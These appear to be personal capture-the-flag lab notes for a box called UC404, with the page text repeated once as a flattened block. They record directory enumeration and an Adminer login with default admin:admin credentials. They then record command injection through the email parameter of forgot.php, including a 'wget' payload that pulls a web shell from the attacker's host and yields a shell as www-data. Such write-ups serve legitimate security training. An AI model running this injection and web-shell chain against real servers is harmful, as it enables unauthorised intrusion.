2 :80 adminlte

http://192.168.136.109/
AdminLTE 3 Landing Page
| (bottom-of-page)  AdminLTE.io Version 3.1.0-pre

| its a visual template

# from nmapAutomator
| http-enum:
|   /.gitignore: Revision control ignore file
|   /.git/HEAD: Git folder
| http-git:
|   192.168.136.109:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|       https://github.com/ColorlibHQ/AdminLTE.git
|_    Project type: Ruby on Rails web application (guessed from .gitignore)

# nikto 
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.

$ gobuster dir -u http://192.168.136.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,html,txt -t 90
===============================================================
/pages                (Status: 301) [Size: 318] [--> http://192.168.136.109/pages/]
/index2.html          (Status: 200) [Size: 71875]
/demo                 (Status: 301) [Size: 317] [--> http://192.168.136.109/demo/]
/index.html           (Status: 200) [Size: 60628]
/plugins              (Status: 301) [Size: 320] [--> http://192.168.136.109/plugins/]
/db                   (Status: 301) [Size: 315] [--> http://192.168.136.109/db/]
/index3.html          (Status: 200) [Size: 42799]
/dist                 (Status: 301) [Size: 317] [--> http://192.168.136.109/dist/]
/build                (Status: 301) [Size: 318] [--> http://192.168.136.109/build/]
/LICENSE              (Status: 200) [Size: 1082]
/starter.html         (Status: 200) [Size: 12884]
/under_construction   (Status: 301) [Size: 331] [--> http://192.168.136.109/under_construction/]

# ffuf
docs                    [Status: 301, Size: 317, Words: 20, Lines: 10]

http://192.168.136.109/db/
Adminer 4.7.7

# from git-repo page
https://github.com/ColorlibHQ/AdminLTE.git
http://192.168.136.109/package.json
"name": "admin-lte",
"version": "3.1.0-pre",

# exploring 192.168.136.109/db
# brute-forcing admin:admin for the different db-types
# worked
System: ClickHouse (alpha)
Server: localhost
Username: admin
Password: admin

http://192.168.136.109/db/?clickhouse=localhost&username=admin
ClickHouse (alpha) version: through PHP extension JSON
Logged as: admin 

# definitely a rabbit hole; can't get anything out of it

http://192.168.136.109/under_construction/
Login Page | UC404
# needs email; don't know it

http://192.168.136.109/under_construction/register.html
has nothing

http://192.168.136.109/under_construction/forgot.php
# view source shows
<!--
  ______ __  __          _____ _         _______     _______ _______ ______ __  __ 
 |  ____|  \/  |   /\   |_   _| |       / ____\ \   / / ____|__   __|  ____|  \/  |
 | |__  | \  / |  /  \    | | | |      | (___  \ \_/ / (___    | |  | |__  | \  / |
 |  __| | |\/| | / /\ \   | | | |       \___ \  \   / \___ \   | |  |  __| | |\/| |
 | |____| |  | |/ ____ \ _| |_| |____   ____) |  | |  ____) |  | |  | |____| |  | |
 |______|_|  |_/_/    \_\_____|______| |_____/   |_| |_____/   |_|  |______|_|  |_|
 

---- Under Construction ----
sendmail.php must receive the variable from the html form and send the message.
|| For security reasons we are working to blacklist some characters ||
//-->

Could not open input file: sendmail.php
1

# trying admin@uc404.com
nothing

# file sendmail.php maybe is not there?
# trying code injection via Burp on GET, as page had
# `Could not open input file: sendmail.php` on GET request

# trying stack query first
GET /under_construction/forgot.php?email=;id HTTP/1.1
Host: 192.168.136.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Upgrade-Insecure-Requests: 1

# response
Could not open input file: sendmail.php
1

Using https://book.hacktricks.xyz/pentesting-web/command-injection

email=||+id
Could not open input file: sendmail.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# we have code execution
email=||wget+192.168.49.136/web.php

http://192.168.136.109/under_construction/web.php
# we have shell

CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
UC404
Linux UC404 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux

Previous3 box enum www-data Next1 recon

Last updated 3 years ago

http://192.168.136.109/ AdminLTE 3 Landing Page | (bottom-of-page) AdminLTE.io Version 3.1.0-pre | its a visual template # from nmapAutomator | http-enum: | /.gitignore: Revision control ignore file | /.git/HEAD: Git folder | http-git: | 192.168.136.109:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Remotes: | https://github.com/ColorlibHQ/AdminLTE.git |_ Project type: Ruby on Rails web application (guessed from .gitignore) # nikto + /.git/config: Git config file found. Infos about repo details may be present. + /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ + /package.json: Node.js package file found. It may contain sensitive information. + /.gitignore: .gitignore file found. It is possible to grasp the directory structure. $ gobuster dir -u http://192.168.136.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,html,txt -t 90 =============================================================== /pages (Status: 301) [Size: 318] [--> http://192.168.136.109/pages/] /index2.html (Status: 200) [Size: 71875] /demo (Status: 301) [Size: 317] [--> http://192.168.136.109/demo/] /index.html (Status: 200) [Size: 60628] /plugins (Status: 301) [Size: 320] [--> http://192.168.136.109/plugins/] /db (Status: 301) [Size: 315] [--> http://192.168.136.109/db/] /index3.html (Status: 200) [Size: 42799] /dist (Status: 301) [Size: 317] [--> http://192.168.136.109/dist/] /build (Status: 301) [Size: 318] [--> http://192.168.136.109/build/] /LICENSE (Status: 200) [Size: 1082] /starter.html (Status: 200) [Size: 12884] /under_construction (Status: 301) [Size: 331] [--> http://192.168.136.109/under_construction/] # ffuf docs [Status: 301, Size: 317, Words: 20, Lines: 10] http://192.168.136.109/db/ Adminer 4.7.7 # from git-repo page https://github.com/ColorlibHQ/AdminLTE.git http://192.168.136.109/package.json "name": "admin-lte", "version": "3.1.0-pre", # exploring 192.168.136.109/db # brute-forcing admin:admin for the different db-types # worked System: ClickHouse (alpha) Server: localhost Username: admin Password: admin http://192.168.136.109/db/?clickhouse=localhost&username=admin ClickHouse (alpha) version: through PHP extension JSON Logged as: admin # definitely a rabbit hole; can't get anything out of it http://192.168.136.109/under_construction/ Login Page | UC404 # needs email; don't know it http://192.168.136.109/under_construction/register.html has nothing http://192.168.136.109/under_construction/forgot.php # view source shows  Could not open input file: sendmail.php 1 # trying admin@uc404.com nothing # file sendmail.php maybe is not there? # trying code injection via Burp on GET, as page had # `Could not open input file: sendmail.php` on GET request # trying stack query first GET /under_construction/forgot.php?email=;id HTTP/1.1 Host: 192.168.136.109 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Connection: close Upgrade-Insecure-Requests: 1 # response Could not open input file: sendmail.php 1 Using https://book.hacktricks.xyz/pentesting-web/command-injection email=||+id Could not open input file: sendmail.php uid=33(www-data) gid=33(www-data) groups=33(www-data) # we have code execution email=||wget+192.168.49.136/web.php http://192.168.136.109/under_construction/web.php # we have shell CMD: whoami;id;hostname;uname -a www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) UC404 Linux UC404 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux